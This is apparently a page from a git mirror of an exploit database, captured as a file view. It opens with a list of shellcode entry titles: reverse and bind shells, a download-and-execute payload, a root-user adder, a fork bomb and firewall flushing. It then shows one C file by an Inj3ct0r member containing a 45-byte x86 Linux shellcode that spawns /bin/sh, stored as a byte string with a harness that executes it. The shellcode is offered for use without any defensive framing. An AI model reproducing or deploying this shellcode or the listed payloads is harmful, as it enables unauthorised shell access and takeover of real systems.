Linux/x64 - setreuid(0_0) + execve(/bin/csh_ [/bin/csh_ NULL]) + XOR Encoded Shellcode (87 bytes)
Linux/x64 - setreuid(0_0) + execve(/bin/ksh_ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (87 bytes)
Linux/x64 - setreuid(0_0) + execve(/bin/zsh_ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (87 bytes)
Linux/x64 - sethostname(Rooted !) + killall Shellcode (33 bytes)

Windows/x86-64 - WinExec(cmd.exe) Shellcode (93 bytes)
Linux/x86 - execve(/bin/sh) + ROT-N + Shift-N + XOR-N Encoded Shellcode (77 bytes)
Windows/x64 - WinExec(cmd.exe) Shellcode (93 bytes)
Windows/x86-64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)
Linux/x86-64 - execve(/bin/sh) -c reboot Shellcode (89 bytes)
Windows/x86-64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)
Windows/x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)
Linux/x64 - execve(/bin/sh) -c reboot Shellcode (89 bytes)
Windows/x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)
Windows/x86-64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)
Windows/x86-64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)
Linux/x86-64 - mkdir() Shellcode (25 bytes)
Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (22 bytes)
Windows/x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)
Windows/x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)
Linux/x64 - mkdir() Shellcode (25 bytes)
Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (22 bytes)

Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes)
Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes)

Linux/x86-64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes)
Linux/x64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes)
Linux/x86-64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes)
Linux/x64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes)
Linux/x64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes)
Linux/x86-64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)
Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes)
Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)
Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes)
Linux/x64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)
Linux/x64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes)
Linux/x64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)
Linux/x64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes)
FreeBSD/x86-64 - execve(/bin/sh) Shellcode (28 bytes)
FreeBSD/x86-64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes)
FreeBSD/x64 - execve(/bin/sh) Shellcode (28 bytes)
FreeBSD/x64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes)
Linux/x86-64 - Execute /bin/sh Shellcode (27 bytes)
Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes)
Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)
Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)
Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes)
Linux/x86-64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes)
Linux/x86-64 - shutdown -h now Shellcode (65 bytes)
Linux/x86-64 - shutdown -h now Shellcode (64 bytes)
Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)
Linux/x86-64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes)
Linux/x64 - Execute /bin/sh Shellcode (27 bytes)
Linux/x64 - Execute /bin/sh Shellcode (24 bytes)
Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)
Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)
Linux/x64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes)
Linux/x64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes)
Linux/x64 - shutdown -h now Shellcode (65 bytes)
Linux/x64 - shutdown -h now Shellcode (64 bytes)
Linux/x64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)
Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)
Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)
Linux/x64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes)

Linux/x86-64 - execve(/bin/sh) Shellcode (21 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (21 bytes)
Windows/x86-64 (10) - Egghunter Shellcode (45 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (2)
Windows/x64 (10) - Egghunter Shellcode (45 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (31 bytes) (2)
Linux/x86-64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes)
Windows/x86-64 / x86 - cmd.exe Shellcode (718 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (1)
Linux/x64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes)
Windows - cmd.exe Shellcode (718 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (31 bytes) (1)

Linux/x86-64 - execve(/bin/sh) Shellcode (24 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (24 bytes)

Linux/x86-64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes)
Linux/x64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes)
Linux/x86-64 - Kill All Processes Shellcode (19 bytes)
Linux/x86-64 - Fork Bomb Shellcode (11 bytes)
Linux/x64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes)
Linux/x64 - Kill All Processes Shellcode (19 bytes)
Linux/x64 - Fork Bomb Shellcode (11 bytes)

Linux/x86-64 - mkdir(evil) Shellcode (30 bytes)
Linux/x64 - mkdir(evil) Shellcode (30 bytes)

Windows/x86-64 - API Hooking Shellcode (117 bytes)
Windows/x64 - API Hooking Shellcode (117 bytes)
2018-01-25 18:22:06 +00:00

38 lines
No EOL
1.8 KiB
C
Raw Blame History

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################### 1
0 I'm gunslinger_ member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
/*
Name : 45 bytes sys_execve("/bin/sh", "0", "0") with umask 16 (sys_umask(14)) x86 linux shellcode
Date : may, 31 2010
Author : gunslinger_
Web : devilzc0de.com
blog : gunslinger.devilzc0de.com
tested on : linux debian
*/
int main(){
char shell[] = "\x31\xc0\x31\xdb\x31\xdb\x31\xd2\x31"
"\xc9\xb0\x3c\x31\xdb\xb3\x0e\xcd\x80"
"\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2"
"\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff"
"\x2f\x62\x69\x6e\x2f\x73\x68";
(*(void (*)()) shell)();
}
Reference in a new issue View git blame Copy permalink